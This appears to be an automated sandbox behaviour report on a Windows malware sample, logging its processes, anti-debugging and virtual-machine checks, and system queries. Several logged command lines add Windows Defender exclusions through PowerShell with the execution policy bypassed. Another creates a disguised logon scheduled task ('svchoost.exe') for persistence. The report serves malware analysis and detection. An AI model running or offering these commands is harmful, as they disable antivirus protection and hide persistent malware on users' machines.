Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\WCTVN\mmytljldrgl.exe	Memory allocated: 2760000 memory reserve \| memory write watch	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	Memory allocated: 1A9C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Memory allocated: 1660000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Memory allocated: 1B0D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Memory allocated: B80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Memory allocated: 1A7C0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe

Code function: 27_2_00007FFD9BAAF1F2 str ax

27_2_00007FFD9BAAF1F2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5954	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3787	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6775	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2825	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Window / User API: threadDelayed 5274	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Window / User API: threadDelayed 4409	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760	Thread sleep count: 5954 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764	Thread sleep count: 3787 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8060	Thread sleep count: 6775 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8064	Thread sleep count: 2825 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8096	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe TID: 3632	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe TID: 7520	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe TID: 7516	Thread sleep count: 5274 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe TID: 7516	Thread sleep count: 4409 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe TID: 7504	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe

Code function: 0_2_00007FF7E76A3798 FindFirstFileExW,

0_2_00007FF7E76A3798

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Thread delayed: delay time: 922337203685477

Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, 00000000.00000002.2060973900.0000026F8A922000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, 00000000.00000002.2060973900.0000026F8A992000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, 00000000.00000002.2060973900.0000026F8A99C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Y
Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, 00000000.00000002.2060973900.0000026F8A992000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWb
Source: Client.exe, 0000001B.00000002.2970279187.000000001BE8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe

Code function: 0_2_00007FF7E76956C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF7E76956C8

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe

Code function: 0_2_00007FF7E76A7CF8 GetProcessHeap,

0_2_00007FF7E76A7CF8

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E768C04C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF7E768C04C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E76956C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7E76956C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E768C5A4 SetUnhandledExceptionFilter,	0_2_00007FF7E768C5A4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E768C400 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7E768C400

Source: C:\WCTVN\mmytljldrgl.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'"

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe

Code function: 0_2_00007FF7E7681F10 GetModuleFileNameA,ShellExecuteExA,GetLastError,

0_2_00007FF7E7681F10

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\WCTVN\mmytljldrgl.exe "C:\WCTVN\mmytljldrgl.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\Client.exe "C:\Users\user\AppData\Roaming\SubDir\Client.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe

Code function: 0_2_00007FF7E7683520 GetConsoleWindow,ShowWindow,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF7E7683520

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe

Code function: 0_2_00007FF7E76ADA00 cpuid

0_2_00007FF7E76ADA00

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: GetLocaleInfoW,	0_2_00007FF7E769F048
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: GetLocaleInfoW,	0_2_00007FF7E76A78AC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00007FF7E76A77FC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_00007FF7E76A6F98
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: GetLocaleInfoW,	0_2_00007FF7E76A76A4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00007FF7E76A745C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: EnumSystemLocalesW,	0_2_00007FF7E769EBC8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: EnumSystemLocalesW,	0_2_00007FF7E76A73C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: EnumSystemLocalesW,	0_2_00007FF7E76A72F4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00007FF7E76A79E0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
